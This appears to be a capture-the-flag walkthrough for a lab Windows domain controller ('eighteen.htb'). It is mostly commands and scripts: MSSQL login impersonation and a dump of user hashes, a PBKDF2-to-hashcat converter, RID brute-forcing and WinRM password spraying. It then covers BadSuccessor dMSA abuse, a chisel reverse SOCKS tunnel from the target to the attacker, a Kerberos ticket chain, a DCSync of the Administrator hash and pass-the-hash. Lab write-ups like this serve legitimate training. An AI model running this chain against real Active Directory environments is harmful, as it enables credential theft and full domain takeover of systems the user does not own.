# Nmap 7.95 scan initiated Sat Nov 15 21:07:18 2025 as: /usr/lib/nmap/nmap --privileged -sVC -oN nmap/nmap.txt 10.10.11.95
Nmap scan report for 10.10.11.95
Host is up (0.084s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to https://eighteen.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info:
| 10.10.11.95:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2025-11-16T02:07:45+00:00; +7h00m00s from scanner time.
| ms-sql-ntlm-info:
| 10.10.11.95:1433:
| Target_Name: EIGHTEEN
| NetBIOS_Domain_Name: EIGHTEEN
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: eighteen.htb
| DNS_Computer_Name: DC01.eighteen.htb
| DNS_Tree_Name: eighteen.htb
|_ Product_Version: 10.0.26100
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-11-16T02:03:13
| Not valid after: 2055-11-16T02:03:13
| MD5: 476f:88fc:069f:2737:76b5:2e2e:4779:65a3
|_SHA-1: b34e:6c28:9f94:95eb:fa32:4b7a:311d:5210:c58a:4425
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
Access MSSQL with impacket-mssqlclient using the SQL login kevin / iNa2we6haRj2gaw! (SQL authentication — note that `-windows-auth` is not passed below, so the `eighteen.htb/` prefix is not used for Kerberos/NTLM).
# Connect with SQL authentication as the SQL login "kevin". impacket only uses the
# domain prefix when -windows-auth is given, so it is cosmetic here. The password
# sits in argv/shell history — fine for a lab, not for a real engagement.
impacket-mssqlclient eighteen.htb/kevin:'iNa2we6haRj2gaw!'@10.10.11.95
# mssqlclient built-in: list the logins the current login is allowed to impersonate
enum_impersonate

# impersonate the "appdev" login (mssqlclient issues EXECUTE AS LOGIN under the hood)
exec_as_login appdev
# switch to the application database
use financial_planner
# list the tables in the current database
SELECT name FROM sys.tables;
# dump the Users table; the password_hash column is converted for hashcat below
SELECT * FROM Users;

We convert the stored `password_hash` (form `pbkdf2:sha256:<iterations>$<salt>$<hexdigest>`, as the script below expects) into hashcat's PBKDF2-HMAC-SHA256 line `sha256:<iterations>:<base64 salt>:<base64 digest>` (mode 10900):
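#!/usr/bin/env python3
"""Convert a PBKDF2 password hash to hashcat's PBKDF2-HMAC line format.

Input (one argument, or several that are re-joined — a hash split by the
shell still works):
    pbkdf2:sha256:<iterations>$<salt>$<hexdigest>
Output (hashcat mode 10900 when the algorithm is sha256):
    sha256:<iterations>:<base64 salt>:<base64 digest>

Exit status 1 with a message on stderr when no hash is given or it is
malformed; the original script crashed with an IndexError/ValueError instead.
"""
import base64
import sys


def convert(h):
    """Return the hashcat line for one stored hash string ``h``.

    Raises ValueError when ``h`` does not have the
    ``<method>:<algo>:<iterations>$<salt>$<hexdigest>`` shape or the digest
    is not valid hex.
    """
    # Everything before the last ':' is the "<method>:<algo>" prefix; the
    # remainder is "<iterations>$<salt>$<hexdigest>".
    prefix, sep, rest = h.rpartition(':')
    if not sep:
        raise ValueError('expected <method>:<algo>:<iterations>$<salt>$<hexdigest>')
    fields = prefix.split(':')
    if len(fields) < 2:
        raise ValueError('missing <method>:<algo> prefix')
    # The second prefix field names the PRF (e.g. "sha256") and becomes
    # hashcat's first field.
    algo = fields[1]

    parts = rest.split('$')
    if len(parts) != 3:
        raise ValueError('expected <iterations>$<salt>$<hexdigest> after the prefix')
    iterations, salt, hex_digest = parts
    if not iterations.isdigit():
        raise ValueError(f'iteration count is not numeric: {iterations!r}')

    # hashcat wants both the salt and the digest base64-encoded; the salt is
    # stored as plain text, the digest as hex. bytes.fromhex() raises
    # ValueError on bad hex, which the caller reports.
    salt_b64 = base64.b64encode(salt.encode()).decode()
    digest_b64 = base64.b64encode(bytes.fromhex(hex_digest)).decode()
    return f'{algo}:{iterations}:{salt_b64}:{digest_b64}'


def main(argv=None):
    """Entry point: print the converted hash; return the process exit status."""
    argv = sys.argv[1:] if argv is None else argv
    # Re-join the arguments so a hash the shell split on whitespace is still
    # accepted (same behaviour as before).
    h = ''.join(argv).strip()
    if not h:
        print('please provide the hash', file=sys.stderr)
        return 1
    try:
        print(convert(h))
    except ValueError as exc:
        print(f'malformed hash: {exc}', file=sys.stderr)
        return 1
    return 0


if __name__ == '__main__':
    sys.exit(main())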
python3 pbkdf2-to-hashcat.py '<HASH>'   # single-quote the hash: it contains `$`, which the shell would otherwise expand

# Enumerate domain accounts through MSSQL by brute-forcing RIDs (SID-to-name
# lookups over the SQL connection) — this works even though SMB/LDAP are not
# reachable from outside (the scan shows only 80, 1433 and 5985 open).
# --local-auth: SQL authentication with the same login used above.
nxc mssql DC01.eighteen.htb -u kevin -p 'iNa2we6haRj2gaw!' --local-auth --rid-brute
From the RID brute-force output we build a user list (the `users` file below, one name per line) and spray the cracked password over WinRM — check the domain lockout policy before spraying more than one password.

# Password spray over WinRM: `users` is a file of candidate usernames, <PASSWORD>
# the (presumably cracked) value from the hash above. 2>/dev/null only hides
# nxc's connection noise — remove it if the command returns nothing at all.
nxc winrm DC01.eighteen.htb -u users -p '<PASSWORD>' 2>/dev/null

# adam.scott accepted the sprayed password: interactive PowerShell over WinRM (5985/tcp)
evil-winrm -i eighteen.htb -u 'adam.scott' -p '<PASSWORD>'


Get-BadSuccessorOUPermissions.ps1 — run on the target to list the OUs (and identities) with permission to create child objects / msDS-DelegatedManagedServiceAccount objects, i.e. where the BadSuccessor path below is possible.

Exploiting Delegated Managed Service Accounts (dMSAs)
Delegated Managed Service Accounts expose a significant attack surface when not strictly controlled. Any user who can create msDS-DelegatedManagedServiceAccount objects — or who holds a generic Create Child permission on an Organizational Unit — can create a new dMSA. Because the creator of an object gets full control over it, a low-privileged attacker can craft a malicious dMSA, obtain Kerberos tickets for it, and weaponize it for BadSuccessor abuse up to full domain compromise. dMSAs are not confined to the protected "Managed Service Accounts" container, which makes this attack path far more accessible in real-world environments. Prerequisite: dMSAs (and therefore this technique) require a Windows Server 2025 domain controller — the NTLM info in the scan above reports build 10.0.26100, which is consistent with that.
# load the script
. ./BadSuccessor.ps1
# execute
BadSuccessor -mode exploit -Path "OU=Staff,DC=eighteen,DC=htb" -Name "mal_DMSA" -DelegatedAdmin "adam.scott" -DelegateTarget "Administrator" -domain "eighteen.htb"

# Pivot: only 80/1433/5985 are reachable from the outside (see the scan above),
# but the Kerberos steps below need 88/tcp (and the RPC/SMB ports) on the DC.
# Attacker side: chisel server accepting reverse tunnels and offering SOCKS5.
chisel server -p 8000 --socks5 --reverse
# Target side (run from the evil-winrm shell; on Windows the binary is chisel.exe):
# opens port 1080 on the attacker as a SOCKS proxy whose traffic exits from the DC.
# FINGERPRINT is the server's key fingerprint printed at startup (pin it so the
# client does not talk to an impostor); point proxychains at 127.0.0.1:1080.
./chisel client --fingerprint FINGERPRINT IP:PORT R:1080:socks
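#!/usr/bin/env bash
# sync.sh — set the local clock to the target's.
#
# Kerberos rejects requests whose timestamp is more than ~5 minutes off the
# KDC's clock, and the scan above reports ~7h of skew. The DC's time is read
# from the Date: header of its WinRM listener on 5985/tcp. The scan identifies
# that port as plain HTTP (HTTPS WinRM would be 5986), so the URL uses http://;
# the original https:// request could not complete a TLS handshake there.
#
# Usage: bash sync.sh <IP>   (needs sudo; re-enable NTP afterwards with
#                             `sudo timedatectl set-ntp true`)
set -euo pipefail

ip="${1:-}"
if [[ -z "$ip" ]]; then
  printf 'Usage: %s <IP>\n' "$0" >&2
  exit 1
fi

# Stop systemd-timesyncd from immediately correcting the clock back.
sudo timedatectl set-ntp false

# Any response (even the 404 the listener returns) carries a Date: header.
# Keep only the first match, strip the CR that HTTP line endings leave behind,
# and swallow the pipeline status so pipefail does not abort silently when no
# header comes back — the empty check below reports it instead.
t="$(curl -s -I -X OPTIONS "http://${ip}:5985/wsman" \
  | grep -i '^Date:' | head -n 1 | cut -d' ' -f2- | tr -d '\r')" || true
if [[ -z "$t" ]]; then
  printf 'Failed to get time from %s\n' "$ip" >&2
  exit 1
fi

# GNU date parses the RFC 1123 "Sat, 15 Nov 2025 21:07:18 GMT" form directly.
sudo date -u --set="$t"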
bash sync.sh <IP>   # run right before the Kerberos steps below; the scan showed ~7h of skew and Kerberos tolerates only a few minutes
# 1) As adam.scott (the -DelegatedAdmin of the dMSA), request a TGT for mal_DMSA$.
#    -dmsa -self asks the KDC for the dMSA's own ticket, whose PAC carries the
#    privileges of the account it supersedes (Administrator). Needs an impacket
#    build with dMSA support. Quote <PASSWORD> if it contains shell metacharacters.
#    Everything goes through the chisel SOCKS tunnel (proxychains); <DC-IP> is the
#    DC address as seen from inside the tunnel.
proxychains -q impacket-getST eighteen.htb/adam.scott:<PASSWORD> -impersonate 'mal_DMSA$' -dc-ip <DC-IP> -dmsa -self
# 2) Use that TGT (impacket names the ccache <principal>@<service>@<REALM>.ccache;
#    the $ is escaped so the shell does not expand it).
export KRB5CCNAME=mal_DMSA\$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache
# 3) With the dMSA's TGT, get a service ticket for CIFS on the DC — the ticket
#    secretsdump consumes below.
proxychains -q impacket-getST eighteen.htb/'mal_DMSA$' -k -no-pass -dc-ip <DC-IP> -spn cifs/dc01.eighteen.htb
export KRB5CCNAME=mal_DMSA\$@cifs_dc01.eighteen.htb@EIGHTEEN.HTB.ccache
# 4) DCSync only the Administrator account using Kerberos (-k -no-pass). The host
#    must be given as the FQDN so it matches the ticket's SPN; resolve it via
#    /etc/hosts so proxychains does not have to do DNS.
proxychains -q impacket-secretsdump -k -no-pass dc01.eighteen.htb -just-dc-user Administrator -dc-ip <DC-IP>

# Pass-the-hash over WinRM with the NT hash secretsdump printed for Administrator
# (-H takes just the NT half, not LM:NT).
evil-winrm -i <target-ip> -u Administrator -H 'HASH'
